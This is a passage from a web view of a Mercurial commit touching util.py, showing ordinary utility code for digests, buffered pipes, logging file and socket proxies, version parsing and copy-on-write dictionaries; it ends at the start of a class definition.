re2: feed unicode string to re2 module when necessary...
marmoute
r47598:112826b5 stable
@@ -1,3669 +1,3680 @@
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import collections
import contextlib
import errno
import gc
import hashlib
import itertools
import locale
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import socket
import stat
import sys
import time
import traceback
import warnings

from .thirdparty import attr
from .pycompat import (
    delattr,
    getattr,
    open,
    setattr,
)
from .node import hex
from hgdemandimport import tracing
from . import (
    encoding,
    error,
    i18n,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import (
    compression,
    hashutil,
    procutil,
    stringutil,
)

base85 = policy.importmod('base85')
osutil = policy.importmod('osutil')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
httplib = pycompat.httplib
pickle = pycompat.pickle
safehasattr = pycompat.safehasattr
socketserver = pycompat.socketserver
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

if pycompat.iswindows:
    from . import windows as platform
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
expandglobs = platform.expandglobs
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
posixfile = platform.posixfile
readlink = platform.readlink
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
split = platform.split
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
umask = platform.umask
unlink = platform.unlink
username = platform.username


def setumask(val):
    '''Updates the umask. Used by the chg server.'''
    if pycompat.iswindows:
        return
    os.umask(val)
    global umask
    platform.umask = umask = val & 0o777


# small compat layer
compengines = compression.compengines
SERVERROLE = compression.SERVERROLE
CLIENTROLE = compression.CLIENTROLE

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass

# Python compatibility

_notset = object()


def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits


# python 2.6 still has deprecation warnings enabled by default. We do not want
# to display anything to standard users, so detect if we are running tests and
# only use python deprecation warnings in this case.
_dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, the module name set through PYTHONWARNINGS was matched exactly,
    # so we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'.
    # This makes the whole PYTHONWARNINGS approach useless for our use case.
    warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
    warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
    warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(
        'ignore', 'bad escape', DeprecationWarning, 'mercurial'
    )
    warnings.filterwarnings(
        'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
    )
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(
        'ignore',
        'the imp module is deprecated',
        DeprecationWarning,
        'mercurial',
    )


def nouideprecwarn(msg, version, stacklevel=1):
198 198 """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += (
            b"\n(compatibility will be dropped after Mercurial-%s,"
            b" update your code.)"
        ) % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
        # on python 3 with chg, we will need to explicitly flush the output
        sys.stderr.flush()


DIGESTS = {
    b'md5': hashlib.md5,
    b'sha1': hashutil.sha1,
    b'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS


class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=b''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_(b'unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise error.Abort(_(b'unknown digest type: %s') % key)
        return hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None


class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise error.Abort(
                _(b'size mismatch: expected %d, got %d')
                % (self._size, self._got)
            )
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise error.Abort(
                    _(b'%s mismatch: expected %s, got %s')
                    % (k, v, self._digester[k])
                )
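

# Illustrative usage sketch (comments only, nothing here is executed). The
# file handle 'fh' is hypothetical; the md5 value is the digest of b'foo'
# from the digester doctest above.
#
#   d = digestchecker(fh, 3, {b'md5': b'acbd18db4cc2f85cedef654fccc4a4d8'})
#   while d.read(4096):
#       pass
#   d.validate()  # raises error.Abort on a size or digest mismatch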


try:
    buffer = buffer
except NameError:

    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset : offset + length]
        return memoryview(sliceable)[offset:]


_chunksize = 4096


class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
353 353 """True is any data is currently buffered
354 354
355 355 This will be used externally a pre-step for polling IO. If there is
356 356 already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def unbufferedread(self, size):
        if not self._eof and self._lenbuf == 0:
            self._fillbuffer(max(size, _chunksize))
        return self._frombuffer(min(self._lenbuf, size))

    def readline(self, *args, **kwargs):
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapses it.
            self._buffer = [b''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find(b'\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find(b'\n')
        size = lfi + 1
        if lfi < 0:  # end of file
            size = self._lenbuf
        elif len(self._buffer) > 1:
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return b''
        buf = self._buffer[0]
        if len(self._buffer) > 1:
            buf = b''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data) :]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), size)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data
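

# Usage sketch (illustrative, not executed): wrap a raw pipe so readline()
# stays efficient while 'hasbuffer' tells callers whether polling is needed
# at all. 'proc' is a hypothetical subprocess with a stdout pipe.
#
#   pipe = bufferedinputpipe(proc.stdout)
#   if not pipe.hasbuffer:
#       poll([pipe.fileno()])  # only poll when nothing is buffered yet
#   line = pipe.readline()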


def mmapread(fp, size=None):
    if size == 0:
        # size of 0 to mmap.mmap() means "all data"
        # rather than "zero bytes", so special case that.
        return b''
    elif size is None:
        size = 0
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return b''
        raise
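

# Usage sketch (illustrative, not executed): map a file's contents without
# reading them into memory up front. The path is hypothetical; note that
# mapping a fixed prefix is only valid if the file is at least that large.
#
#   with open(b'some-file', 'rb') as fp:
#       data = mmapread(fp)          # whole file; empty files yield b''
#       head = mmapread(fp, 4096)    # first 4096 bytes only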


class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """

    __slots__ = (
        '_orig',
        '_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, '_orig', fh)
        object.__setattr__(self, '_observer', observer)

    def __getattribute__(self, name):
        ours = {
            '_observer',
            # IOBase
            'close',
            # closed if a property
            'fileno',
            'flush',
            'isatty',
            'readable',
            'readline',
            'readlines',
            'seek',
            'seekable',
            'tell',
            'truncate',
            'writable',
            'writelines',
            # RawIOBase
            'read',
            'readall',
            'readinto',
            'write',
            # BufferedIOBase
            # raw is a property
            'detach',
            # read defined above
            'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, '_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, '_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, '_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, '_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, '_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, '_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, '_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'close', *args, **kwargs
        )

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'fileno', *args, **kwargs
        )

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'flush', *args, **kwargs
        )

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'isatty', *args, **kwargs
        )

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'readable', *args, **kwargs
        )

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'readline', *args, **kwargs
        )

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'readlines', *args, **kwargs
        )

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'seek', *args, **kwargs
        )

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'seekable', *args, **kwargs
        )

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'tell', *args, **kwargs
        )

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'truncate', *args, **kwargs
        )

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'writable', *args, **kwargs
        )

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'writelines', *args, **kwargs
        )

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'read', *args, **kwargs
        )

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'readall', *args, **kwargs
        )

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'readinto', *args, **kwargs
        )

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'write', *args, **kwargs
        )

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'detach', *args, **kwargs
        )

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'read1', *args, **kwargs
        )


class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """

    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, 'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, 'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, 'bufferedreadline', None)
        if fn:
            fn(res)

        return res


PROXIED_SOCKET_METHODS = {
    'makefile',
    'recv',
    'recvfrom',
    'recvfrom_into',
    'recv_into',
    'send',
    'sendall',
    'sendto',
    'setblocking',
    'settimeout',
    'gettimeout',
    'setsockopt',
}


class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """

    __slots__ = (
        '_orig',
        '_observer',
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, '_orig', sock)
        object.__setattr__(self, '_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, '_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, '_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, '_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, '_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, '_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, '_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, '_observedcall')(
            'makefile', *args, **kwargs
        )

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, '_observer')
        return makeloggingfileobject(
            observer.fh,
            res,
            observer.name,
            reads=observer.reads,
            writes=observer.writes,
            logdata=observer.logdata,
            logdataapis=observer.logdataapis,
        )

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recv', *args, **kwargs
        )

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recvfrom', *args, **kwargs
        )

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recvfrom_into', *args, **kwargs
        )

    def recv_into(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recv_into', *args, **kwargs
        )

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'send', *args, **kwargs
        )

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'sendall', *args, **kwargs
        )

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'sendto', *args, **kwargs
        )

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'setblocking', *args, **kwargs
        )

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'settimeout', *args, **kwargs
        )

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'gettimeout', *args, **kwargs
        )

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'setsockopt', *args, **kwargs
        )


class baseproxyobserver(object):
    def __init__(self, fh, name, logdata, logdataapis):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis

    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write(b'\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(b': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write(
                    b'%s> %s\n' % (self.name, stringutil.escapestr(data))
                )
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(b':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write(
                b'%s> %s\n' % (self.name, stringutil.escapestr(line))
            )
        self.fh.flush()


class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""

    def __init__(
        self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
    ):
        super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = b''

        if size == -1 and res == b'':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
            )

        data = dest[0:res] if res is not None else b''

        # _writedata() uses "in" operator and is confused by memoryview because
        # characters are ints on Python 3.
        if isinstance(data, memoryview):
            data = data.tobytes()

        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
            )

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> bufferedreadline() -> %d' % (self.name, len(res))
            )

        self._writedata(res)


def makeloggingfileobject(
    logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(
        logh,
        name,
        reads=reads,
        writes=writes,
        logdata=logdata,
        logdataapis=logdataapis,
    )
    return fileobjectproxy(fh, observer)
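

# Usage sketch (illustrative, not executed): observe I/O on a file object
# while debugging. 'logfh' and the wrapped file are hypothetical.
#
#   fh = makeloggingfileobject(logfh, open(b'data.bin', 'rb'), b'data',
#                              logdata=True)
#   fh.read(10)  # logs a line like "data> read(10) -> 10: ..." to logfh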


class socketobserver(baseproxyobserver):
    """Logs socket activity."""

    def __init__(
        self,
        fh,
        name,
        reads=True,
        writes=True,
        states=True,
        logdata=False,
        logdataapis=True,
    ):
        super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
        self.reads = reads
        self.writes = writes
        self.states = states

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
            )
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recvfrom(%d, %d) -> %d'
                % (self.name, size, flags, len(res[0]))
            )

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recvfrom_into(%d, %d) -> %d'
                % (self.name, size, flags, res[0])
            )

        self._writedata(buf[0 : res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
            )

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        self.fh.write(
            b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
        )
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write(
                b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
            )

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write(
                b'%s> sendto(%d, %d, %r) -> %d'
                % (self.name, len(data), flags, address, res)
            )

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write(
            b'%s> setsockopt(%r, %r, %r) -> %r\n'
            % (self.name, level, optname, value, res)
        )


def makeloggingsocket(
    logh,
    fh,
    name,
    reads=True,
    writes=True,
    states=True,
    logdata=False,
    logdataapis=True,
):
    """Turn a socket into a logging socket."""

    observer = socketobserver(
        logh,
        name,
        reads=reads,
        writes=writes,
        states=states,
        logdata=logdata,
        logdataapis=logdataapis,
    )
    return socketproxy(fh, observer)
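

# Usage sketch (illustrative, not executed): the socket analogue of
# makeloggingfileobject; per the proxy docstrings this is meant for tests.
# 'logfh' and 'rawsock' are hypothetical.
#
#   sock = makeloggingsocket(logfh, rawsock, b'conn', logdata=True)
#   sock.sendall(b'ping')  # logs "conn> sendall(4, 0): ping"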


def version():
    """Return version information if available."""
    try:
        from . import __version__

        return __version__.version
    except ImportError:
        return b'unknown'


def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
    if not m:
        vparts, extra = b'', v
    elif m.group(2):
        vparts, extra = m.groups()
    else:
        vparts, extra = m.group(1), None

    assert vparts is not None  # help pytype

    vints = []
    for i in vparts.split(b'.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)


def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    if func.__code__.co_argcount == 0:
        listcache = []

        def f():
            if len(listcache) == 0:
                listcache.append(func())
            return listcache[0]

        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]

    else:

        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f
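

# Usage sketch (illustrative, not executed): memoize a pure function of
# positional arguments; per the XXX above, keyword arguments are not handled.
#
#   @cachefunc
#   def _double(arg):  # hypothetical; the body runs once per distinct arg
#       return arg * 2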


class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self


class sortdict(collections.OrderedDict):
    """a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    >>> d1.insert(1, b'a.5', 0.5)
    >>> d1
    sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
    """

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = pycompat.iteritems(src)
            for k, v in src:
                self[k] = v

    def insert(self, position, key, value):
        for (i, (k, v)) in enumerate(list(self.items())):
            if i == position:
                self[key] = value
            if i >= position:
                del self[k]
                self[k] = v


class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """


class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """


class transactional(object):  # pytype: disable=ignored-metaclass
